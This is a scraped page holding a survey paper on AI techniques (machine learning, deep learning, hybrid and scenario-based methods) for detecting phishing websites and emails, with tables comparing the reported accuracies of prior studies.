Downloads (Last 12 months) 1,175
Downloads (Last 6 weeks) 91
Guo S Fan Y (2024) X-Phishing-Writer: A Framework for Cross-lingual Phishing E-mail Generation ACM Transactions on Asian and Low-Resource Language Information Processing 10.1145/3670402 23 :7 (1-34) Online publication date: 26-Jun-2024 https://dl.acm.org/doi/10.1145/3670402
Kanaoka A Isohara T (2024) Enhancing Smishing Detection in AR Environments: Cross-Device Solutions for Seamless Reality 2024 IEEE Conference on Virtual Reality and 3D User Interfaces Abstracts and Workshops (VRW) 10.1109/VRW62533.2024.00108 (565-572) Online publication date: 16-Mar-2024 https://doi.org/10.1109/VRW62533.2024.00108
Sarker O Jayatilaka A Haggag S Liu C Babar M (2024) A Multi-vocal Literature Review on challenges and critical success factors of phishing education, training and awareness Journal of Systems and Software 10.1016/j.jss.2023.111899 208 :C Online publication date: 4-Mar-2024 https://dl.acm.org/doi/10.1016/j.jss.2023.111899
Varshney G Kumawat R Varadharajan V Tupakula U Gupta C (2024) Anti-phishing Expert Systems with Applications: An International Journal 10.1016/j.eswa.2023.122199 238 :PF Online publication date: 27-Feb-2024 https://dl.acm.org/doi/10.1016/j.eswa.2023.122199
Baltuttis D Teubner T (2024) Effects of visual risk indicators on phishing detection behavior: An eye-tracking experiment Computers & Security 10.1016/j.cose.2024.103940 144 (103940) Online publication date: Sep-2024 https://doi.org/10.1016/j.cose.2024.103940
Marshall N Sturman D Auton J (2024) Exploring the evidence for email phishing training Computers and Security 10.1016/j.cose.2023.103695 139 :C Online publication date: 16-May-2024 https://dl.acm.org/doi/10.1016/j.cose.2023.103695
Chen R Li Z Han W Zhang J (2024) A Survey of Attack Techniques Based on MITRE ATT&CK Enterprise Matrix Network Simulation and Evaluation 10.1007/978-981-97-4522-7_13 (188-199) Online publication date: 2-Aug-2024 https://doi.org/10.1007/978-981-97-4522-7_13

View Options

Check if you have access through your login credentials or your institution to get full access on this article.

Full Access

View options.

View or Download as a PDF file.

View online with eReader .

HTML Format

View this article in HTML Format.

Share this Publication link

Copying failed.

Share on social media

Affiliations, export citations.

Please download or close your previous search result export first before starting a new bulk export. Preview is not available. By clicking download, a status dialog will open to start the export process. The process may take a few minutes but once it finishes a file will be downloadable from your browser. You may continue to browse the DL while the export process is in progress. Download
Download citation
Copy citation

We are preparing your search results for download ...

We will inform you here when the file is ready.

Your file of search results citations is now ready.

Your search export query has expired. Please try again.

An official website of the United States government

The .gov means it’s official. Federal government websites often end in .gov or .mil. Before sharing sensitive information, make sure you’re on a federal government site.

The site is secure. The https:// ensures that you are connecting to the official website and that any information you provide is encrypted and transmitted securely.

Publications
Account settings

Preview improvements coming to the PMC website in October 2024. Learn More or Try it out now .

Advanced Search
Journal List
Springer Nature - PMC COVID-19 Collection

A comprehensive survey of AI-enabled phishing attacks detection techniques

Abdul basit.

1 Department of Computer Science, Air University, E-9, Islamabad, Pakistan

Maham Zafar

2 School of Information Engineering, Yangzhou University, Yangzhou, China

Abdul Rehman Javed

3 Department of Cyber Security, Air University, E-9, Islamabad, Pakistan

Zunera Jalil

Kashif kifayat.

In recent times, a phishing attack has become one of the most prominent attacks faced by internet users, governments, and service-providing organizations. In a phishing attack, the attacker(s) collects the client’s sensitive data (i.e., user account login details, credit/debit card numbers, etc.) by using spoofed emails or fake websites. Phishing websites are common entry points of online social engineering attacks, including numerous frauds on the websites. In such types of attacks, the attacker(s) create website pages by copying the behavior of legitimate websites and sends URL(s) to the targeted victims through spam messages, texts, or social networking. To provide a thorough understanding of phishing attack(s), this paper provides a literature review of Artificial Intelligence (AI) techniques: Machine Learning, Deep Learning, Hybrid Learning, and Scenario-based techniques for phishing attack detection. This paper also presents the comparison of different studies detecting the phishing attack for each AI technique and examines the qualities and shortcomings of these methodologies. Furthermore, this paper provides a comprehensive set of current challenges of phishing attacks and future research direction in this domain.

Introduction

The process of protecting cyberspace from attacks has come to be known as Cyber Security [ 16 , 32 , 37 ]. Cyber Security is all about protecting, preventing, and recovering all the resources that use the internet from cyber-attacks [ 20 , 38 , 47 ]. The complexity in the cybersecurity domain increases daily, which makes identifying, analyzing, and controlling the relevant risk events significant challenges. Cyberattacks are digital malicious attempts to steal, damage, or intrude into the personal or organizational confidential data [ 2 ]. Phishing attack uses fake websites to take sensitive client data, for example, account login credentials, credit card numbers, etc. In the year of 2018, the Anti-Phishing Working Group (APWG) detailed above 51,401 special phishing websites. Another report by RSA assessed that worldwide associations endured losses adding up to $9 billion just due to phishing attack happenings in the year 2016 [ 26 ]. These stats have demonstrated that the current anti-phishing techniques and endeavors are not effective. Figure 1 shows how a typical phishing attack activity happens.

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig1_HTML.jpg

Phishing attack diagram [ 26 ]

Personal computer clients are victims of phishing attack because of the five primary reasons [ 60 ]: (1) Users do not have brief information about Uniform Resource Locator (URLs), (2) the exact idea about which pages can be trusted, (3) entire location of the page because of the redirection or hidden URLs, (4) the URL possess many possible options, or some pages accidentally entered, (5) Users cannot differentiate a phishing website page from the legitimate ones.

Phishing websites are common entry points of online social engineering attacks, including numerous ongoing web scams [ 30 ]. In such type of attacks, the attackers create website pages by copying genuine websites and send suspicious URLs to the targeted victims through spam messages, texts, or online social networking. An attacker scatters a fake variant of an original website, through email, phone, or content messages [ 5 ], with the expectation that the targeted victims would accept the cases in the email made. They will likely target the victim to include their personal or highly sensitive data (e.g., bank details, government savings number, etc.). A phishing attack brings about an attacker acquiring bank card information and login data. In any case, there are a few methods to battle phishing [ 27 ]. The expanded utilization of Artificial Intelligence (AI) has affected essentially every industry, including cyber-security. On account of email security, AI has brought speed, accuracy, and the capacity to do a detailed investigation. AI can detect spam, phishing, skewers phishing, and different sorts of attacks utilizing previous knowledge in the form of datasets. These type of attacks likely creates a negative impact on clients’ trust toward social services such as web services. According to the APWG report, 1,220,523 phishing attacks have been reported in 2016, which is 65% more expansion than 2015 [ 1 ]. Figure 2 shows the Phishing Report for the third quarter of 2019.

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig2_HTML.jpg

Phishing report for third quarter of the year 2019 [ 1 ]

As per Parekh et al. [ 51 ], a generic phishing attack has four stages. First, the phisher makes and sets up a fake website that looks like an authentic website. Secondly, the person sends a URL connection of the website to a targeted victim pretending like a genuine organization, user, or association. Thirdly, the person in question will be tempted to visit the injected fake website. Fourth, the unfortunate targeted victim will click on the fake source link and give his/her valuable data as input. By utilizing the individual data of the person in question, impersonation activities will be performed by the phisher. APWG contributes individual reports on phishing URLs and analyzes the regularly evolving nature and procedures of cybercrimes. The Anti-Phishing Working Group (APWG) tracks the number of interesting phishing websites, an essential proportion of phishing over the globe. Phishing locales dictate the interesting base URLs. The absolute number of phishing websites recognized by APWG in the 3rd quarter-2019 was 266,387 [ 3 ]. This was 46% from the 182,465 seen in Q2 and in Q4-2018 practically twofold 138,328 was seen.

Figure 3 shows the most targeted industries in 2019. Attacks on distributed storage and record facilitating websites, financial institutions stayed more frequent, and attacks on the gaming, protection, vitality, government, and human services areas were less prominent during the 3rd quarter [ 3 ].

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig3_HTML.jpg

Most targeted industry sectors—3rd quarter 2019 [ 3 ]

MarkMonitor is an online brand insurance association, verifying licensed innovation. In the 3rd quarter of 2019, the greatest focus of phishing remained Software as a service (SaaS) and webmail websites. Phishers keep on collecting credentials to these sorts of websites, using them to execute business email compromises (BEC) and to enter corporate SaaS accounts.

This survey covers the four aspects of a phishing attack: communication media, target devices, attack technique, and counter-measures as shown in Fig. 4 . Human collaboration is a communication media with an application targeted by the attack. Seven types of communication media which include Email, Messenger, Blog & Forum, Voice over internet protocol, Website, Online Social Network (OSN), and Mobile platform are identified from the literature. For the selection of attack strategies, our devices play a significant role as victims interact online through physical devices. Phishing attack may target personal computers, smart devices, voices devices, and/or WiFi-smart devices which includes VOIP devices as well as mobile phone device.

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig4_HTML.jpg

Taxonomy of this survey focusing on phishing attack detection studies

Attack techniques are grouped into two categories: attack launching and data collection. For attack launching, several techniques are identified such as email spoofing, attachments, abusing social settings, URLs spoofing, website spoofing, intelligent voice reaction, collaboration in a social network, reserve social engineering, man in the middle attack, spear phishing, spoofed mobile internet browser and installed web content. Meanwhile, for data collection during and after the victim’s interaction with attacks, various data collection techniques are used [ 49 ]. There are two types of data collection techniques, one is automated data collection techniques (such as fake websites forms, key loggers, and recorded messages) and the other is manual data collection techniques (such as human misdirection and social networking). Then, there are counter-measures for victim’s data collected or used before and after the attack. These counter-measures are used to detect and prevent attacks. We categorized counter-measurement into four groups (1) Deep learning-based Techniques, (2) Machine learning Techniques, (3) Scenario-based Techniques, and (4) Hybrid Techniques.

To the best of our knowledge, existing literature [ 11 , 18 , 28 , 40 , 62 ] include a limited number of surveys focusing more on providing an overview of attack detection techniques. These surveys do not include details about all deep learning, machine learning, hybrid, and scenario based techniques. Besides, these surveys lack in providing an extensive discussion about current and future challenges for phishing attack detection.

Keeping in sight the above limitations, this article makes the following contributions:

Provide a comprehensive and easy-to-follow survey focusing on deep learning, machine learning, hybrid learning, and scenario-based techniques for phishing attack detection.
Provide an extensive discussion on various phishing attack techniques and comparison of results reported by various studies.
Provide an overview of current practices, challenges, and future research directions for phishing attack detection.

The study is divided into the following sections: Sect. 1 present the introduction of phishing attacks. Section 2 presents the literature survey focusing on deep learning, machine learning, hybrid learning, and scenario-based phishing attack detection techniques and presents the comparison of these techniques. Section 3 presents a discussion on various approaches used in literature. Section 4 present the current and future challenges. Section 5 concludes the paper with recommendations for future research.

Literature survey

This paper explores detailed literature available in prominent journals, conferences, and chapters. This paper explores relevant articles from Springer, IEEE, Elsevier, Wiley, Taylor & Francis, and other well-known publishers. This literature review is formulated after an exhaustive search on the existing literature published in the last 10 years.

A phishing attack is one of the most serious threats for any organization and in this section, we present the work done on phishing attacks in more depth along with its different types. Initially, the phishing attacks were performed on telephone networks also known as Phone Phreaking which is the reason the term “fishing” was replaced with the term “Phishing”, ph replaced f in fishing. From the reports of the anti-phishing working group (APWG) [ 1 ], it can be confirmed that phishing was discovered in 1996 when America-on-line (AOL) accounts were attacked by social engineering. Phishing turns into a danger to numerous people, especially individuals who are unaware of the dangers while being in the internet world. In light of a report created by the Federal Bureau of Investigation (FBI) [ 4 ], from October-2013 to February-2016, a phishing attack caused severe damage of 2.3 billion dollars. In general, users tend to overlook the URL of a website. At times, phishing tricks connected through phishing websites can be effectively prevented by seeing whether a URL is of phishing or an authentic website. For the situation where a website is suspected as a targeted phish, a client can escape from the criminal’s trap.

The conventional approaches for phishing attack detection give low accuracy and can recognize only about 20% of phishing attacks. Machine learning approaches give good outcomes for phishing detection but are time-consuming even on the small-sized datasets and not scale-able. Phishing recognition by heuristics techniques gives high false-positive rates. Client mindfulness is a significant issue, for resistance against phishing attacks. Fake URLs are utilized by phisher, to catch confidential private data of the targeted victim like bank account data, personal data, username, secret password, etc.

Previous work on phishing attack detection has focused on one or more techniques to improve accuracy however, accuracy can be further improved by feature reduction and by using an ensemble model. Existing work done for phishing attack detection can be placed in four categories:

Deep learning for phishing attack detection

Machine learning for phishing attack detection

Scenario-based phishing attack detection

Hybrid learning based Phishing attack detection

Deep learning (DL) for phishing attack detection

This section describes the DL approaches-based intrusion detection systems. Recent advancements in DL approaches suggested that the classification of phishing websites using deep NN should outperform the traditional Machine Learning (ML) algorithms. However, the results of utilizing deep NN heavily depend on the setting of different learning parameters [ 61 ]. There exist multiple DL approaches used for cybersecurity intrusion detection [ 25 ], namely, (1) deep neural-network, (2) feed-forward deep neural-network, (3) recurrent neural-network, (4) convolutional neural-network, (5) restricted Boltzmann machine, (6) deep belief network, (7) deep auto-encoder. Figure 5 shows the working of deep learning models. A batch of input data is fed to the neurons and assigned some weights to predict the phishing attack or legitimate traffic.

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig5_HTML.jpg

Authors in Benavides et al. [ 15 ] work to incorporate a combination of each chosen work and the classification. They characterize the DL calculations chosen in every arrangement, which yielded that the most regularly utilized are the Deep Neural Network (DNN) and Convolutional Neural Network (CNN) among all. Diverse DL approaches have been presented and analyzed, but there exists a research gap in the use of DL calculations in recognition of cyber-attacks.

Authors in Shie [ 55 ] worked on the examination of different techniques and talked about different strategies for precisely recognizing phishing attacks. Of the evaluated strategies, DL procedures that used feature extraction shows good performance because of high accuracy, while being robust. Classifications models also depict good performance. Authors in Maurya and Jain [ 46 ] proposed an anti-phishing structure that depends on utilizing a phishing identification model dependent on DL, at the ISP’s level to guarantee security at a vertical scale as opposed to even execution. This methodology includes a transitional security layer at ISPs and is set between various workers and end-clients. The proficiency of executing this structure lies in the way that a solitary purpose of blocking can guarantee a large number of clients being protected from a specific phishing attack. The calculation overhead for phishing discovery models is restricted distinctly to ISPs and end users are granted secure assistance independent of their framework designs without highly efficient processing machines.

Authors in Subasi et al. [ 57 ] proposed a comparison of Adaboost and multi boosting for detecting the phishing website. They used the UCI machine learning repository dataset having 11,055 instances, and 30 features. AdaBoost and multi boost are the proposed ensemble learners in this research to upgrade the presentation of phishing attack calculations. Ensemble models improve the exhibition of the classifiers in terms of precision, F-measure, and ROC region. Experimental results reveal that by utilizing ensemble models, it is possible to recognize phishing pages with a precision of 97.61%. Authors in Abdelhamid et al. [ 9 ] proposed a comparison based on model content and features. They used a dataset from PhishTank, containing around 11,000 examples. They used an approach named enhanced dynamic rule induction (eDRI) and claimed that dynamic rule induction (eDRI) is the first algorithm of machine learning and DL which has been applied to an anti-phishing tool. This algorithm passes datasets with two main threshold frequencies and rules strength. The training dataset only stores “strong” features and these features become part of the rule while others are removed.

Authors in Mao et al. [ 44 ] proposed a learning-based system to choose page design comparability used to distinguish phishing attack pages. for effective page layout features, they characterized the guidelines and build up a phishing page classifier with two conventional learning-algorithms, SVM and DT. They tested the methodology on real website page tests from phishtank.com and alexa.com. Authors in Jain and Gupta [ 34 ] proposed techniques and have performed experiments on more than two datasets. First from Phishtank containing 1528 phishing websites, second from Openphish: which contains 613 phishing websites, third from Alexa: which contains 1600 legitimate websites, fourth from payment gateway: which contains 66 legitimate websites, and fifth from top banking website: which contains 252 legitimate websites. By applying machine-learning algorithms, they improved accuracy for phishing detection. They used RF, SVM, Neural-Networks (NN), LR, and NB. They used a feature extraction approach on the client-side.

Authors in Li et al. [ 42 ] proposed a novel approach in which the URL is sent as input and the URL, as well as HTML related features, are extracted. After feature extraction, a stacking model is used to combine classifiers. They performed experiments on different datasets: The first one was obtained from Phishtank, with 2000 web pages (1000 legitimate and 1000 phishing). The second dataset is a larger one with 49,947 web pages (30,873 legitimate, and 19,074 phishing) and was taken from Alexa. They used a support vector machine, NN, DT, RF, and combined these through stacking to achieve better accuracy. This research achieves good accuracy using different classifiers.

Some studies are limited to few classifiers and some used many classifiers, but their techniques were not efficient or accurate. Two datasets have been commonly used by researchers in past and these are publicly accessible from Phishtank and UCI machine learning repository. ML techniques have been used but without feature reduction, and some studies used only a few classifiers to compare their results.

Machine learning (ML) for phishing attack detection

ML approaches are popular for phishing websites detection and it becomes a simple classification problem. To train a machine learning model for a learning-based detection system, the data at hand must-have features that are related to phishing and legitimate website classes. Different classifiers are used to detect a phishing attack. Previous studies show that detection accuracy is high as robust ML techniques are used. Several feature selection techniques are used to reduce features. Figure 6 shows the working of the machine learning model. A batch of input data is given as input for training to the machine learning model to predict the phishing attack or legitimate traffic.

An external file that holds a picture, illustration, etc.
Object name is 11235_2020_733_Fig6_HTML.jpg

By reducing features, dataset visualization becomes more efficient and understandable. The most significant classifiers that were used in various studies and are found to give good phishing attack detection accuracy are C4.5, k-NN, and SVM. These classifiers are based on DTs such as C4.5, so it gives the maximum accuracy and efficiency to detect a phishing attack. To further explore the detection of phishing attacks, researchers have mentioned the limitations of their work. Many highlighted a common limitation that ensemble learning techniques are not used, and in some studies, feature reduction was not done. Authors in James et al. [ 36 ] used different classifiers such as C4.5, IBK, NB, and SVM. Similarly, authors in Liew et al. [ 43 ] used RF to distinguish phishing attacks from original web pages. Authors in Adebowale et al. [ 10 ] used the Adaptive Neuro-Fuzzy Inference System based robust scheme using the integrated features for phishing attack detection and protection.

Authors in Zamir et al. [ 65 ] presented an examination of supervised learning and stacking models to recognize phishing websites. The rationale behind these experiments was to improve the classification precision through proposed features with PCA and the stacking of the most efficient classifiers. Stacking (RF, NN, stowing) outperformed other classifiers with proposed features N1 and N2. The experiments were performed on the phishing websites datasets. The data-set contained 32 pre-processed features with 11,055 websites. Authors in Alsariera et al. [ 13 ] used four meta-student models: AdaBoost-Extra Tree (ABET), Bagging-Extra tree (BET), Rotation Forest-Extra Tree (RoFBET), and LogitBoost-Extra Tree (LBET), using the extra-tree base classifier. The proposed meta-algorithms were fitted for phishing website datasets, and their performance was tested. Furthermore, the proposed models beat existing ML-based models in phishing attack recognition. Thus, they suggest the appropriation of meta-algorithms when building phishing attack identification models.

Authors in El Aassal et al. [ 22 ] proposed a benchmarking structure called PhishBench, which enables us to assess and analyze the existing features for phishing detection and completely understand indistinguishable test conditions, i.e., unified framework specification, datasets, classifiers, and performance measurements. The examinations indicated that the classification execution dropped when the proportion among phishing and authentic decreases towards 1 to 10. The decrease in execution extended from 5.9 to 42% in F1-score. Furthermore, PhishBench was likewise used to test past techniques on new and diverse datasets.

Authors in Subasi and Kremic [ 56 ] proposed an intelligent phishing website identification system. They utilized unique ML models to classify websites as genuine or phishing. A few classification methods were used to implement an accurate and smart phishing website detecting structure. ROC area, F-measure, and AUC were used to assess the performance of ML techniques. Results demonstrated that Adaboost with SVM performed best among all other classification techniques achieving the highest accuracy of 97.61%. Authors in Ali and Malebary [ 12 ] proposed a phishing website detection technique utilizing Particle Swarm Optimization (PSO) based component weighting to improve the detection of phishing websites. Their proposed approach recommends using PSO to weigh different websites, effectively accomplishing higher accuracy when distinguishing phishing websites. In particular, the proposed PSO based website features weighting is utilized to separate different features in websites, given how significantly these contribute towards distinguishing the phishing from real websites. Results showed that the ML models improved with the proposed PSO-based component weighting to effectively distinguish, and monitor both phishing and real websites separately.

Authors in James et al. [ 36 ] used datasets from Alexa and Phishtank. Their proposed approach read the URL one by one and analyze the host-name URL and path to classify into an attack or legitimate activity using four classifiers: NB, DT, KNN, and Support Vector Machine (SVM). Authors in Subasi et al. [ 57 ] used Artificial Neural Network (ANN), KNN, SVM, RF, Rotation Forest, and C4.5. They discussed in detail how these classifiers are very accurate in detecting a phishing attack. They claim that the accuracy of the RF is not more than 97.26%. All other classifiers got the same accuracy as given in the study. Authors in Hutchinson et al. [ 31 ] proposed a study on phishing website detection focusing on features selection. They used the dataset of the UCI machine learning repository that contains 11,055 URLs and 30 features and divided these features into six groups. They selected three groups and concluded that these groups are suitable options for accurate phishing attack detection.

Authors in Abdelhamid et al. [ 9 ] creates a method called Enhanced Dynamic Rule Induction (eDRI) to detect phishing attacks. They used feature extraction, Remove replace feature selection technique (RRFST), and ANOVA to reduce features. The results show that they have the highest accuracies of 93.5% in comparison with other studies. The research [ 29 ] proposed a feature selection technique named as Remove Replace Feature Selection Technique (RRFST). They claim that they got the phishing email dataset from the khoonji’s anti-phishing website containing 47 features. The DT was used to predict the performance measures.

Authors in Tyagi et al. [ 58 ] used a dataset from the UCI machine learning repository that contains unique 2456 URL instances, and 11,055 total number of URLs that have 6157 phishing websites and 4898 legitimate websites. They extracted 30 features of URLs and used these features to predict the phishing attack. There were two possible outcomes whether the user has to be notified that the website is a phishing or aware user that the website is safe. They used ML algorithms such as DT, RF, Gradient Boosting (GBM), Generalized Linear Model (GLM), and PCA. The authors in Chen and Chen [ 17 ] used the SMOTE method which improves the detection coverage of the model. They trained machine learning models including bagging, RF, and XGboost. Their proposed method achieved the highest accuracy through the XGboost method. They used the dataset of Phishtank which has 24,471 phishing websites and 3850 legitimate websites.

Authors in Joshi et al. [ 39 ] used a RF algorithm as a binary classifier and reliefF algorithm for feature selection algorithm. They used the dataset from the Mendeley website which is given as input to the feature selection algorithm to select efficient features. Next, they trained a RF algorithm over the selected features to predict the phishing attack. Authors in Ubing et al. [ 59 ] proposed their work on ensemble Learning. They used ensemble learning through three techniques that were bagging, boosting, stacking. Their dataset contains 30 features with a result column of 5126 records. The dataset is taken from UCI, which is publicly accessible. They had combined their classifiers to acquire the maximum accuracy which they got from a DT. Authors in Mao et al. [ 45 ] used different machine learning classifiers that include SVM, DT, AdaBoost, and RF to predict the phishing attack. Authors in Sahingoz et al. [ 54 ] created their dataset. The dataset contains 73,575 URLs, and out of this 36,400 legitimate URLs and 37,175 phishing URLs. As they mentioned that Phishtank doesn’t give a free dataset on the web page therefore they created their dataset. They used seven classification-algorithms and natural-language-processing (NLP) based features for phishing attack detection.

Table Table1 1 presents the summary of ML approaches for phishing websites detection. Table shows that some studies provide highly efficient results for phishing attack detection.

ML approaches for phishing websites detection

Authors	Classification method	Feature selection method	Accuracy (%)
James et al. [ ]	J48, JBK, SVM, NB	–	89.75
Abdelhamid et al. [ ]	eDRI	–	93.5
Mao et al. [ ]	SVM, RF, DT, AB	–	97.31
Jain and Gupta [ ]	–	Feature extraction	99.09
Hota et al. [ ]	CART, C4.5	RRFST	99.11
Ubing et al. [ ]	EL	–	95.4
Chen and Chen [ ]	ELM, SVM, LR, C$.5, LC-ELM, KNN, XGB	ANOVA	99.2

In this section, we provide a comparison of scenario-based phishing attack detection used by various researchers. The comparison of scenario-based techniques to detect a phishing attack is shown in Table Table2. 2 . Studies show that different scenarios worked with various methods and provides different outcomes.

Comparison of scenario based studies

Authors	Scenarios	Method	Accuracy
Yao et al. [ ]	Identity detection processs	Logo extraction	98.3%
Curtis et al. [ ]	Dark traid attacker’s concept	Dark traid	–
Williams et al. [ ]	62,000 employers over 6 weeks of observation	Theoretical approaches	–
Parsons et al. [ ]	Worked on 985 participants	ANOVA	–

Authors in Begum and Badugu [ 14 ] discussed some approaches which are useful to detect a phishing attack. They performed a detailed survey of existing techniques such as Machine Learning (ML) based approaches, Non-machine Learning-based approaches, Neural Network-based approaches, and Behavior-based detection approaches for phishing attack detection. Authors in Yasin et al. [ 64 ] consolidated various studies that researchers have used to clarify different exercises of social specialists. Moreover, they proposed that a higher comprehension of the social engineering attack scenarios would be possible utilizing topical and game-based investigation techniques. The proposed strategy for interpreting social engineering attack scenario is one such endeavor to empower people to comprehend general attack scenarios. Even though the underlying outcomes have demonstrated neutral outcomes, the hypothetically predictable system of this strategy despite everything, merits future augmentation and re-performance.

Authors in Fatima et al. [ 23 ] presented PhishI as a precise way to deal with structure genuine games for security training. They characterize a game structure system that incorporates the group of information on social networking, that needs authoritative players. They used stick phishing as a guide to show how the proposed approach functions, and afterward assessed the learning impacts of the produced game dependent on observational information gathered from the student’s movement. In the PhishI game, members are needed to trade phishing messages and have the option to remark on the viability of the attack scenario. Results demonstrated that student’s attention to spear-phishing chances is improved and that the protection from the first potential attack is upgraded. Moreover, the game demonstrated a beneficial outcome on members’ comprehension of extreme online data and information disclosure.

Authors in Chiew et al. [ 18 ] concentrated phishing attacks in detail through their features of the medium and vector which they live in and their specialized methodologies. Besides, they accept this information will assist the overall population by taking preparatory and preventive activities against these phishing attacks and the policies to execute approaches to check any further misuse by the phishers. Relying just on client instruction as a preventive measure in a phishing attack is not sufficient. Their survey shows that the improvement of clever frameworks to counter these specialized methodologies is required, as such countermeasures will have the option to recognize and disable both existing attacks and new phishing dangers.

Authors in Yao et al. [ 63 ] used the logo extraction method by using the identity detection process to detect phishing. Two non-overlapping datasets were made from a sum of 726 pages. Phishing pages are from the PhishTank website, and the legitimate website pages are from the Alexa website as they limited their work by not using the DL technique. The authors gave the concept of dark triad attackers. Phishing exertion and execution, and end-users’ arrangement of emails are the theoretical approach of the dark triad method. They had limited their work as end-client members may have been hyper-mindful of potential duplicity and in this way progressively careful in their ratings of each email than they would be in their normal workplace. Authors in Williams et al. [ 62 ] uses a mixed approach to detect a phishing attack. They used ensemble learning to investigate 62, 000 instances over a six-week time frame to detect phishing messages, called spear phishing. As they had a drawback of just taking information from two organizations, employee observations and encounters are probably going to be affected by a scope of components that might be explicit to the association considered.

Authors in Parsons et al. [ 52 ] used the method of ANOVA. In a scenario-based phishing study, they took a total of 985 participants completed to play a role. Two-way repeated-measures analysis of variance (ANOVA) was led to survey the impact of email authenticity and that impact was focused on the study. This investigation included only one phishing and one certifiable email with one of the standards and did not test the impact of numerous standards inside an email. Following are the comparison of specific classifier known as RF which is the most used algorithm by the researchers.

Table Table3 3 provides a comparison of RF classifiers with different datasets and different approaches. Some studies reduced features without creating a lot of impact on accuracy and the remaining studies focused on accuracy. Authors in Subasi et al. [ 57 ] used different classifiers to detect phishing attacks and they achieved an accuracy of 97.36% by RF algorithm.

Authors	Classification method	Feature selection method	Accuracy (%)
Subasi et al. [ ]	ANN, KNN, RF, SVM, C4.5, RF	–	97.36
Tyagi et al. [ ]	DT, RF, GBM	PCA	98.4
Mao et al. [ ]	SVM, RF, DT, AB	–	97.31
Jagadeesan et al. [ ]	RF, SVM	–	95.11
Joshi et al. [ ]	RF, RA	RA	97.63
Sahingoz et al. [ ]	SVM, DT, RF, KNN, KS, NB	NLP	97.98

Authors in Tyagi et al. [ 58 ] used 30 features to detect the attack by RF. They used other classifiers as well but their result on RF was better than other classifiers. Similarly, authors in Mao et al. [ 45 ] collected the dataset of 49 phishing websites from PhishinTank.com . They used four learning classifiers to detect phishing attacks and concluded that the RF classifiers are much better than others. Authors in Jagadeesan et al. [ 33 ] used two datasets one from UCI Machine Learning Repository having 30 features and one target class, containing 2456 instances of phishing and non-phishing URLs. The second dataset comprises of 1353 URLs with 10 features, grouped into 3 classifications: phishing, non-phishing and suspicious. They concluded that RF provides better accuracy than that of support vector machine. Authors in Joshi et al. [ 39 ] used the dataset from Mendeley website which is publicly accessible. The dataset contains 5000 legitimate and 5000 phishing records. Authors in Sahingoz et al. [ 54 ] used Ebbu2017 Phishing Dataset containing 73,575 URLs in which 36,400 are legitimate URLs and 37,175 are phishing URLs. They proposed seven different classification algorithms including Natural Language Processing (NLP) based features. They actually used a dataset which is not used commonly for detecting phishing attack.

Authors in Williams et al. [ 62 ] conducted two studies considering different aspects of emails. The email that is received, the person who received that email, and the context of the email all the theoretical approaches were studied in this paper. They believe that the current study will provide a way to theoretical development in this field. They considered 62,000 employers over 6 weeks and observed the individuals and targeted phishing emails known as spear phishing. Authors in Parsons et al. [ 52 ] proposed and worked on 985 participants who completed a role in a scenario-based phishing study. They used two-way repeated-measures analysis of variance which was named (ANOVA) to assess the effect of email legitimacy and email influence. The email which was used in their research indicates that the recipient has previously donated to some charity.

Authors in Yao et al. [ 63 ] proposed a methodology which mainly includes two processes: logon extraction and identity detection. The proposed methodology describes that the logon extraction extracted the logo from the image from the two-dimensional code after performing image processing. Next, the identity detection process assessed the relationship between the actual identity of the website and it’s described identity. If the identity is actual then the website is legitimate, if it is not then this is a phishing website. They created two datasets which are non-overlapping datasets from 726 web pages. The dataset contains phishing web pages and legitimate web pages. The legitimate pages are taken from Alexa, whereas the phishing pages are taken from Phishtank. They believe that logo extraction can be improved in the future. Authors in Curtis et al. [ 21 ] introduced the dark triad attacker’s concepts. They used a dark triad score to complete the 27 items short dark triad with both attackers. The end-users were asked to participate in the scenario to assign scores based on psychopathy, narcissism, and Machiavellianism.

Hybrid learning (HL) based phishing attack detection

In this section, we present the comparison of HL models which are used by state-of-the-art studies as shown in Tables Tables4 4 and and5 5 The studies show how the accuracies got improved by ensemble and HL techniques.

Comparison of hybrid methods used in state-of-the-art

Authors	Classification method	Accuracy (%)
Patil et al. [ ]	LR, DT, RF	96.58
Niranjan et al. [ ]	RC, KNN, IBK, LR, PART	97.3
Chiew et al. [ ]	RF, C4.5, Part, SVM, NB	96.17
Pandey et al. [ ]	RF, SVM	94

Comparison table of state-of-the-art studies focusing on phishing techniques

Authors	Classification	Feature selection technique	Accuracy
James et al. [ ]	J48, IBK, SVM, NB	–	89.75%
Subasi et al. [ ]	ANN, kNN, RF, SVM, C4.5, RF	–	97.36%
Abdelhamid et al. [ ]	eDRI	–	93.5%
Mao et al. [ ]	SVM, DT	–	93%
Jain and Gupta [ ]	–	–	99.09%
Yao et al. [ ]	–	–	98.3%
Patil et al. [ ]	LR, DT, RF	–	96.58%
Jagadeesan et al. [ ]	RF, SVM	–	95.11%
Hota et al. [ ]	CART, C4.5	RRFST	99.11%
Tyagi et al. [ ]	DT, RF, GBM	PCA	98.40%
Curtis et al. [ ]	–	–	–
Sahingoz et al. [ ]	SVM, DT, RF, kNN, KS, NB	NLP	97.98%
Parsons et al. [ ]	–	–	–
Joshi et al. [ ]	RF, RA	RA	97.63%
Ubing et al. [ ]	EL	–	95.4%
Mao et al. [ ]	SVM, RF, DT, AB	–	97.31%
Williams et al. [ ]	–	–	–
Niranjan et al. [ ]	RC, kNN, IBK, LR, PART	–	97.3%
Chen and Chen [ ]	ELM, SVM, LR, C4.5, LC-ELM, kNN, XGB	ANOVA	99.2%
Chiew et al. [ ]	RF, C4.5, PART, SVM, NB	–	96.17%
Pandey et al. [ ]	SVM, RF	–	94%

Authors in Kumar et al. [ 41 ] separated some irrelevant features from the content and pictures and applied SVM as a binary classifier. They group the real and phished messages with strategies like Text parsing, word tokenization, and stop word evacuation. The authors in Jain et al. [ 35 ] utilized TF-IDF to locate the most significant features of the website to be used in the search question, yet it has been well adjusted to improve execution. The proposed approach has been discovered to be more accurate for their methodology against existing techniques utilizing the traditional TF-IDF approach.

